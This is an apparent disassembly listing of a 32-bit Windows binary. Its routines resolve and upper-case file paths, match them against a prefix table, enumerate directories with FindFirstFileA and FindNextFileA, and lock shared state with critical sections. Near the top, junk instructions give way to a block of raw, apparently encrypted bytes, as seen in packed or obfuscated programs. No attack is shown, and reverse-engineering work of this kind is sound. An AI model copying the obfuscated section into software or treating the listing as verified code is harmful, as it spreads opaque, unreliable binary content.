mov eax, [ebp-184h]
mov [ebp-1Ch], eax
push 104h
mov ecx, [ebp-1Ch]
push ecx
push 0
call ds:dword_4E1718 ; GetModuleHandleA
push eax
call ds:dword_4E1714 ; GetModuleFileNameA
mov edx, [ebp+0Ch]
add edx, 82h
mov [ebp-24h], edx
mov eax, [ebp-24h]
mov ecx, [eax]
and ecx, 4
neg ecx
sbb ecx, ecx
neg ecx
mov [ebp-20h], ecx
cmp dword ptr [ebp-20h], 0
jz loc_4CEFFE
lea ecx, [ebp-160h]
call sub_4D7798
mov dword ptr [ebp-164h], 10h
push 290000h
call sub_4CDB7E
nop
popf
sub ebp, esi
mov cl, 93h
cmp esi, [ebp-2071CF1Dh]
adc [esi+edx], esp
cmp eax, 7CBB222Fh
push ecx
cmc
dec esp
retn
; ---------------------------------------------------------------------------
db 97h, 0B9h, 0ADh
dd 8ABDEFA0h, 9EAD89FBh, 2913CC7h, 0B285F704h, 96CCFC1Ch
dd 7F09E16h, 414E5A1Bh, 5268559Ah, 0CEE6F301h, 5A4DC906h
dd 0AA81500Fh, 2EF9409Bh, 66792330h, 0F898C230h, 0DBDCAA42h
dd 6D7A86E7h, 0CA3421CFh, 12121F2Ch, 2E21267Bh, 41556C53h
dd 7AA1946Fh, 5A2D4F5Ch, 37742DE4h, 3A4FF67Eh, 345119B4h
dd 65810DFEh, 5D294B58h, 6AF5E8E6h, 36541C2Ch, 95B155ABh
dd 0AD011488h, 0A7053D6Bh, 0EB46731h, 0C4A9AD9Ah, 3BEAABB8h
dd 2A000177h, 11364351h, 0F5037066h, 3E3124E8h, 0F96AB34Bh
dd 59670CFAh, 0DB0D434Ch, 0F081716Eh, 0FFB6D7E4h, 8996A2CFh
dd 2180E38Ch, 212F443Ah, 96907314h, 0CDC6D3E1h, 8593E8D6h
dd 24A5A778h, 1C5D4D32h, 0DDE20310h, 0C1357DA8h, 818FECC2h
dd 8EF4A374h, 0E560C6CBh, 0F2E200F3h, 4E41A771h, 82751533h
dd 5D21748Fh, 90902F3Ch, 0C085C033h
db 75h, 0EEh
; ---------------------------------------------------------------------------
loc_4CEFFE: ; CODE XREF: _4:004CEEC0�j
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_4CF00C
jmp short loc_4CF025
; =============== S U B R O U T I N E =======================================
sub_4CF00C proc near ; CODE XREF: _4:004CF005�p
; DATA XREF: _5:004DE2B8�o
mov ecx, [ebp-1Ch]
mov [ebp-188h], ecx
mov edx, [ebp-188h]
push edx
call sub_4D83DD
add esp, 4
retn
sub_4CF00C endp
; ---------------------------------------------------------------------------
loc_4CF025: ; CODE XREF: _4:004CF00A�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CF036 proc near ; CODE XREF: sub_4DB1EA+1F�p
var_38 = dword ptr -38h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004CF153 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE2C0
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 20h
push ebx
push esi
push edi
or [ebp+var_1C], 0FFFFFFFFh
push 0
lea eax, [ebp+var_1C]
push eax
push 3
push 80000000h
push [ebp+arg_0]
call sub_4D0346
test eax, eax
jz loc_4CF153
cmp [ebp+var_1C], 0FFFFFFFFh
jz loc_4CF153
mov eax, ds:dword_4E18E4
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4CF0A7
mov eax, [ebp+var_2C]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_30], 1
jmp short loc_4CF0AB
; ---------------------------------------------------------------------------
loc_4CF0A7: ; CODE XREF: sub_4CF036+5C�j
and [ebp+var_30], 0
loc_4CF0AB: ; CODE XREF: sub_4CF036+6F�j
movzx eax, [ebp+var_30]
test eax, eax
jz loc_4CF153
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_1C]
mov ecx, ds:dword_4E18E4
call sub_4DB871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4CF120
push [ebp+var_1C]
call sub_4D5456
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
cmp [ebp+var_20], 0
jnz short loc_4CF0FF
push ds:off_4DE4F8
push 1Fh
push ds:off_4DE4FC
call sub_4D848C
loc_4CF0FF: ; CODE XREF: sub_4CF036+B4�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov [ebp+var_24], eax
push 0FFFFFFFFh
mov [ebp+var_38], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp short loc_4CF155
; ---------------------------------------------------------------------------
loc_4CF120: ; CODE XREF: sub_4CF036+A0�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4CF12B
jmp short loc_4CF153
sub_4CF036 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4CF12B proc near ; CODE XREF: sub_4CF036+EE�p
; DATA XREF: _5:004DE2C8�o
mov eax, ds:dword_4E18E4
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short loc_4CF146
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
loc_4CF146: ; CODE XREF: sub_4CF12B+C�j
lea eax, [ebp-28h]
push eax
push dword ptr [ebp-1Ch]
call sub_4D0741
retn
sub_4CF12B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4CF036
loc_4CF153: ; CODE XREF: sub_4CF036+40�j
; sub_4CF036+4A�j ...
xor eax, eax
loc_4CF155: ; CODE XREF: sub_4CF036+E8�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_4CF036
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CF166 proc near ; CODE XREF: sub_4CF252+1B5�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
cmp [ebp+arg_4], 0
jz short loc_4CF187
mov ecx, [ebp+arg_4]
mov edi, [ebp+arg_8]
mov esi, [ebp+arg_0]
xor eax, eax
repe cmpsb
jnz loc_4CF24A
loc_4CF187: ; CODE XREF: sub_4CF166+C�j
push 5Ch
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
push eax
call sub_4CC640
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4CF216
mov eax, [ebp+arg_C]
mov byte ptr [eax], 1
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
inc eax
cmp eax, 80h
jbe short loc_4CF1C6
xor eax, eax
jmp loc_4CF24C
; ---------------------------------------------------------------------------
loc_4CF1C6: ; CODE XREF: sub_4CF166+57�j
mov ecx, [ebp+var_C]
mov esi, [ebp+arg_8]
add esi, [ebp+arg_4]
mov edi, offset byte_4E1844
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_C]
and ds:byte_4E1844[eax], 0
mov eax, [ebp+arg_10]
mov dword ptr [eax], offset byte_4E1844
push offset byte_4E1844
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_4CC06B
pop ecx
pop ecx
neg eax
sbb eax, eax
neg eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
jmp short loc_4CF24C
; ---------------------------------------------------------------------------
loc_4CF216: ; CODE XREF: sub_4CF166+38�j
mov eax, [ebp+arg_C]
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
call sub_4CC06B
pop ecx
pop ecx
neg eax
sbb eax, eax
neg eax
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
add eax, [ebp+arg_4]
mov ecx, [ebp+arg_10]
mov [ecx], eax
mov eax, [ebp+var_10]
jmp short loc_4CF24C
; ---------------------------------------------------------------------------
loc_4CF24A: ; CODE XREF: sub_4CF166+1B�j
xor eax, eax
loc_4CF24C: ; CODE XREF: sub_4CF166+5B�j
; sub_4CF166+AE�j ...
pop edi
pop esi
leave
retn 14h
sub_4CF166 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CF252 proc near ; CODE XREF: sub_4CF63E+56�p
; sub_4CF6DE+90�p
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 004CF62B SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE2D0
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 44h
push ebx
push esi
push edi
push offset dword_4E18C8
call ds:dword_4E16C4 ; RtlEnterCriticalSection
and [ebp+var_4], 0
cmp ds:dword_4E1908, 0
jnz short loc_4CF2A8
push 0FFFFFFFFh
and [ebp+var_4C], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_4C]
jmp loc_4CF62D
; ---------------------------------------------------------------------------
loc_4CF2A8: ; CODE XREF: sub_4CF252+3B�j
and [ebp+var_24], 0
lea eax, [ebp+var_24]
push eax
mov eax, ds:dword_4E1908
add eax, 810h
push eax
push 104h
push [ebp+arg_0]
call ds:dword_4E1708 ; GetFullPathNameA
mov [ebp+var_28], eax
push [ebp+var_28]
mov eax, ds:dword_4E1908
add eax, 810h
push eax
call ds:dword_4E17C8 ; CharUpperBuffA
mov ecx, [ebp+var_28]
call sub_4D1470
mov eax, ds:dword_4E1908
mov eax, [eax+0Ch]
mov [ebp+var_20], eax
and [ebp+var_1C], 0
and [ebp+var_2C], 0
and [ebp+var_30], 0
mov eax, ds:dword_4E1908
mov ecx, [eax+0C14h]
mov edi, ds:dword_4E1908
add edi, 10h
mov esi, ds:dword_4E1908
add esi, 810h
xor eax, eax
repe cmpsb
jnz loc_4CF614
mov eax, ds:dword_4E1908
mov eax, [eax+0C14h]
mov ecx, ds:dword_4E1908
lea eax, [ecx+eax+810h]
mov [ebp+var_3C], eax
and [ebp+var_38], 0
push 5Ch
push [ebp+var_3C]
call sub_4CC700
pop ecx
pop ecx
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jz short loc_4CF369
mov eax, [ebp+var_34]
sub eax, [ebp+var_3C]
inc eax
mov [ebp+var_38], eax
jmp short loc_4CF395
; ---------------------------------------------------------------------------
loc_4CF369: ; CODE XREF: sub_4CF252+109�j
mov eax, ds:dword_4E1684
mov eax, [eax+24h]
and eax, 20h
test eax, eax
jnz short loc_4CF391
push 0FFFFFFFFh
and [ebp+var_50], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_50]
jmp loc_4CF62D
; ---------------------------------------------------------------------------
loc_4CF391: ; CODE XREF: sub_4CF252+124�j
and [ebp+var_38], 0
loc_4CF395: ; CODE XREF: sub_4CF252+115�j
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
test ecx, ecx
jnz short loc_4CF3B1
cmp [ebp+arg_8], 0
jnz short loc_4CF3B1
jmp loc_4CF5EB
; ---------------------------------------------------------------------------
loc_4CF3B1: ; CODE XREF: sub_4CF252+152�j
; sub_4CF252+158�j
cmp [ebp+arg_8], 0
jz short loc_4CF3D4
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 0
jz short loc_4CF3D4
mov eax, [ebp+arg_8]
mov ecx, ds:dword_4E1908
mov eax, [eax]
sub eax, [ecx+8]
sar eax, 4
inc eax
mov [ebp+var_1C], eax
loc_4CF3D4: ; CODE XREF: sub_4CF252+163�j
; sub_4CF252+16B�j
jmp short loc_4CF3DD
; ---------------------------------------------------------------------------
loc_4CF3D6: ; CODE XREF: sub_4CF252:loc_4CF412�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_4CF3DD: ; CODE XREF: sub_4CF252:loc_4CF3D4�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnb short loc_4CF414
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_4E1908
mov ecx, [ecx+8]
mov eax, [ecx+eax]
push dword ptr [eax]
push [ebp+var_38]
push [ebp+var_3C]
call sub_4CF166
test eax, eax
jz short loc_4CF412
jmp short loc_4CF414
; ---------------------------------------------------------------------------
loc_4CF412: ; CODE XREF: sub_4CF252+1BC�j
jmp short loc_4CF3D6
; ---------------------------------------------------------------------------
loc_4CF414: ; CODE XREF: sub_4CF252+191�j
; sub_4CF252+1BE�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnb loc_4CF5EB
mov edi, [ebp+var_2C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_48], ecx
movzx eax, [ebp+var_30]
test eax, eax
jz short loc_4CF4AC
jmp short loc_4CF441
; ---------------------------------------------------------------------------
loc_4CF43A: ; CODE XREF: sub_4CF252:loc_4CF4AA�j
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
loc_4CF441: ; CODE XREF: sub_4CF252+1E6�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_1C], eax
jnb short loc_4CF4AC
mov eax, [ebp+var_1C]
inc eax
shl eax, 4
mov ecx, ds:dword_4E1908
mov ecx, [ecx+8]
mov eax, [ecx+eax]
mov edi, [eax]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_48]
add eax, [ebp+var_38]
cmp ecx, eax
jb short loc_4CF4A8
mov ecx, [ebp+var_48]
add ecx, [ebp+var_38]
mov eax, [ebp+var_1C]
shl eax, 4
mov edx, ds:dword_4E1908
mov edx, [edx+8]
mov eax, [edx+eax]
mov edi, [eax]
mov eax, [ebp+var_1C]
inc eax
shl eax, 4
mov edx, ds:dword_4E1908
mov edx, [edx+8]
mov eax, [edx+eax]
mov esi, [eax]
xor eax, eax
repe cmpsb
jz short loc_4CF4AA
loc_4CF4A8: ; CODE XREF: sub_4CF252+21F�j
jmp short loc_4CF4AC
; ---------------------------------------------------------------------------
loc_4CF4AA: ; CODE XREF: sub_4CF252+254�j
jmp short loc_4CF43A
; ---------------------------------------------------------------------------
loc_4CF4AC: ; CODE XREF: sub_4CF252+1E4�j
; sub_4CF252+1F6�j ...
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_4E1908
mov ecx, [ecx+8]
mov eax, [ecx+eax+4]
add eax, [ebp+var_38]
mov [ebp+var_2C], eax
mov eax, [ebp+var_1C]
shl eax, 4
mov ecx, ds:dword_4E1908
mov ecx, [ecx+8]
add ecx, eax
mov [ebp+var_40], ecx
mov eax, [ebp+var_40]
mov eax, [eax]
mov [ebp+var_44], eax
xor eax, eax
mov edi, [ebp+arg_4]
stosd
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+arg_4]
add edi, 2Ch
rep stosd
cmp [ebp+var_48], 104h
jnb short loc_4CF505
mov eax, [ebp+var_48]
mov [ebp+var_54], eax
jmp short loc_4CF50C
; ---------------------------------------------------------------------------
loc_4CF505: ; CODE XREF: sub_4CF252+2A9�j
mov [ebp+var_54], 104h
loc_4CF50C: ; CODE XREF: sub_4CF252+2B1�j
mov ecx, [ebp+var_54]
mov esi, [ebp+var_2C]
mov edi, [ebp+arg_4]
add edi, 2Ch
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
mov edi, [ebp+arg_4]
add edi, 130h
stosd
stosd
stosd
stosw
cmp [ebp+var_48], 0Eh
jbe short loc_4CF545
mov [ebp+var_58], 0Eh
jmp short loc_4CF54B
; ---------------------------------------------------------------------------
loc_4CF545: ; CODE XREF: sub_4CF252+2E8�j
mov eax, [ebp+var_48]
mov [ebp+var_58], eax
loc_4CF54B: ; CODE XREF: sub_4CF252+2F1�j
mov ecx, [ebp+var_58]
mov esi, [ebp+var_2C]
mov edi, [ebp+arg_4]
add edi, 130h
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
movzx eax, [ebp+var_30]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_44]
mov ecx, [ecx+8]
mov [eax+20h], ecx
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+4], edx
mov eax, [eax+20h]
mov [ecx+8], eax
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+0Ch], edx
mov eax, [eax+20h]
mov [ecx+10h], eax
mov eax, [ebp+var_40]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov edx, [eax+1Ch]
mov [ecx+14h], edx
mov eax, [eax+20h]
mov [ecx+18h], eax
cmp [ebp+arg_8], 0
jz short loc_4CF5D2
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_40]
mov [eax], ecx
loc_4CF5D2: ; CODE XREF: sub_4CF252+376�j
push 0FFFFFFFFh
mov [ebp+var_5C], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_5C]
jmp short loc_4CF62D
; ---------------------------------------------------------------------------
loc_4CF5EB: ; CODE XREF: sub_4CF252+15A�j
; sub_4CF252+1C8�j
cmp [ebp+arg_8], 0
jz short loc_4CF60C
mov eax, ds:dword_4E1908
mov eax, [eax+0Ch]
shl eax, 4
mov ecx, ds:dword_4E1908
mov ecx, [ecx+8]
add ecx, eax
mov eax, [ebp+arg_8]
mov [eax], ecx
loc_4CF60C: ; CODE XREF: sub_4CF252+39D�j
push 12h
call ds:dword_4E178C ; RtlRestoreLastWin32Error
loc_4CF614: ; CODE XREF: sub_4CF252+D1�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4CF61F
jmp short loc_4CF62B
sub_4CF252 endp
; =============== S U B R O U T I N E =======================================
sub_4CF61F proc near ; CODE XREF: sub_4CF252+3C6�p
; DATA XREF: _5:004DE2D8�o
push offset dword_4E18C8
call ds:dword_4E1754 ; RtlLeaveCriticalSection
retn
sub_4CF61F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4CF252
loc_4CF62B: ; CODE XREF: sub_4CF252+3CB�j
xor eax, eax
loc_4CF62D: ; CODE XREF: sub_4CF252+51�j
; sub_4CF252+13A�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4CF252
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CF63E proc near ; CODE XREF: sub_4DA334+E�p
; sub_4DA361+7D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+arg_8]
or dword ptr [eax], 0FFFFFFFFh
push 0Ch
call sub_4D835A
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4CF67B
mov eax, [ebp+var_8]
and dword ptr [eax], 0
mov eax, [ebp+var_8]
and dword ptr [eax+4], 0
mov eax, [ebp+var_8]
and dword ptr [eax+8], 0
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
jmp short loc_4CF67F
; ---------------------------------------------------------------------------
loc_4CF67B: ; CODE XREF: sub_4CF63E+1F�j
and [ebp+var_C], 0
loc_4CF67F: ; CODE XREF: sub_4CF63E+3B�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and dword ptr [eax], 0
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4CF252
test eax, eax
jz short loc_4CF6D8
push 0
push [ebp+arg_0]
call sub_4D92CA
pop ecx
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+4], eax
mov eax, [ebp+var_4]
and dword ptr [eax+8], 0
push [ebp+var_4]
push [ebp+var_4]
mov ecx, ds:dword_4E18EC
call sub_4CC000
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
mov [eax], ecx
and [ebp+var_4], 0
push 1
pop eax
jmp short locret_4CF6DA
; ---------------------------------------------------------------------------
loc_4CF6D8: ; CODE XREF: sub_4CF63E+5D�j
xor eax, eax
locret_4CF6DA: ; CODE XREF: sub_4CF63E+98�j
leave
retn 0Ch
sub_4CF63E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CF6DE proc near ; CODE XREF: sub_4DA626+12�p
; sub_4DA657+19�p
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 004CF805 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE2F0
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_4E18EC
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4CF724
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_4CF728
; ---------------------------------------------------------------------------
loc_4CF724: ; CODE XREF: sub_4CF6DE+31�j
and [ebp+var_24], 0
loc_4CF728: ; CODE XREF: sub_4CF6DE+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz loc_4CF805
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E18EC
call sub_4DB871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz loc_4CF7DE
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jnz short loc_4CF778
push [ebp+var_1C]
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call sub_4CF252
mov ecx, [ebp+arg_8]
mov [ecx], eax
loc_4CF778: ; CODE XREF: sub_4CF6DE+82�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 0
jnz short loc_4CF7C5
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jnz short loc_4CF7B1
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call ds:dword_4E16D0 ; FindFirstFileA
mov ecx, [ebp+var_1C]
mov [ecx+8], eax
mov eax, [ebp+var_1C]
xor ecx, ecx
cmp dword ptr [eax+8], 0FFFFFFFFh
setnz cl
mov eax, [ebp+arg_8]
mov [eax], ecx
jmp short loc_4CF7C5
; ---------------------------------------------------------------------------
loc_4CF7B1: ; CODE XREF: sub_4CF6DE+A9�j
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
call ds:dword_4E16D4 ; FindNextFileA
mov ecx, [ebp+arg_8]
mov [ecx], eax
loc_4CF7C5: ; CODE XREF: sub_4CF6DE+A0�j
; sub_4CF6DE+D1�j
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_4CF807
; ---------------------------------------------------------------------------
loc_4CF7DE: ; CODE XREF: sub_4CF6DE+6F�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4CF7E9
jmp short loc_4CF805
sub_4CF6DE endp
; =============== S U B R O U T I N E =======================================
sub_4CF7E9 proc near ; CODE XREF: sub_4CF6DE+104�p
mov eax, ds:dword_4E18EC
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_4CF804
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4CF804: ; CODE XREF: sub_4CF7E9+C�j
retn
sub_4CF7E9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4CF6DE
loc_4CF805: ; CODE XREF: sub_4CF6DE+50�j
; sub_4CF6DE+109�j
xor eax, eax
loc_4CF807: ; CODE XREF: sub_4CF6DE+FE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4CF6DE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CF818 proc near ; CODE XREF: sub_4D0741+CE�p
; sub_4DA5FF+B�p
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004CF939 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE300
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
mov eax, ds:dword_4E18EC
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_4CF85E
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_4CF862
; ---------------------------------------------------------------------------
loc_4CF85E: ; CODE XREF: sub_4CF818+31�j
and [ebp+var_2C], 0
loc_4CF862: ; CODE XREF: sub_4CF818+44�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_4CF939
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4E18EC
call sub_4DB871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz loc_4CF912
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jz short loc_4CF8A2
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
call ds:dword_4E16A4 ; CloseHandle
loc_4CF8A2: ; CODE XREF: sub_4CF818+7C�j
push [ebp+arg_0]
mov ecx, ds:dword_4E18EC
call sub_4DB8E0
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4CF8EC
mov eax, [ebp+var_20]
mov eax, [eax+4]
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_4D83DD
pop ecx
push 1
pop eax
and eax, 1
test eax, eax
jz short loc_4CF8E4
push [ebp+var_20]
call sub_4D83DD
pop ecx
loc_4CF8E4: ; CODE XREF: sub_4CF818+C1�j
mov eax, [ebp+var_20]
mov [ebp+var_38], eax
jmp short loc_4CF8F0
; ---------------------------------------------------------------------------
loc_4CF8EC: ; CODE XREF: sub_4CF818+A5�j
and [ebp+var_38], 0
loc_4CF8F0: ; CODE XREF: sub_4CF818+D2�j
mov eax, [ebp+arg_4]
mov dword ptr [eax], 1
push 0FFFFFFFFh
mov [ebp+var_3C], 1
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_4CF93B
; ---------------------------------------------------------------------------
loc_4CF912: ; CODE XREF: sub_4CF818+6F�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4CF91D
jmp short loc_4CF939
sub_4CF818 endp
; =============== S U B R O U T I N E =======================================
sub_4CF91D proc near ; CODE XREF: sub_4CF818+FE�p
; DATA XREF: _5:004DE308�o
mov eax, ds:dword_4E18EC
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short locret_4CF938
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
locret_4CF938: ; CODE XREF: sub_4CF91D+C�j
retn
sub_4CF91D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4CF818
